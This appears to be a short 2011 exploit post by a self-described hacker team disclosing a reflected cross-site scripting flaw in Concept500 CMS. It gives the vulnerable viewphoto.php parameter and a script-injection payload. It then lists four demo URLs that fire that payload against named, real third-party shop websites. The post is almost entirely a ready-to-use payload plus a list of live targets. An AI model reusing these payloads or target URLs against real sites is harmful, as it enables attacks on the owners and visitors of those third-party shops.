Concept500 CMS suffers from a cross site scripting vulnerability.
dff823603f0ab3278cc322760103de45afa6281001d91c4741f53e8e65af35ef
# Exploit Title: Concept500 CMS XSS Vulnerability
# Date: 2011-08-11
# Author: Sepehr Security Team
# Software Site: http://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
#Exploit:
http://<=- Domain -=>/shop/viewphoto.php?shoph=id[XSS]&phqu=id
#XSS:
"> <script>alert(String.fromCharCode(88, 83, 83))</script>
#Demo:
http://www.clementsmilitaria.com/shop/viewphoto.php?shoph=50293"><script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=4
http://www.dbmilitaria.co.uk/shop/viewphoto.php?shoph=10242"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=2
http://www.dhbmilitaria.com/shop/viewphoto.php?shoph=50084"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=0
http://www.dorsetmilitaria.com/shop/viewphoto.php?shoph=50680"> <script>alert(String.fromCharCode(88, 83, 83))</script>&phqu=5
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
#Spc Tanx to All Sepehr Sceurity Team Members And All Iranian Hack3rs
#wWw.Sepehr-Team.orG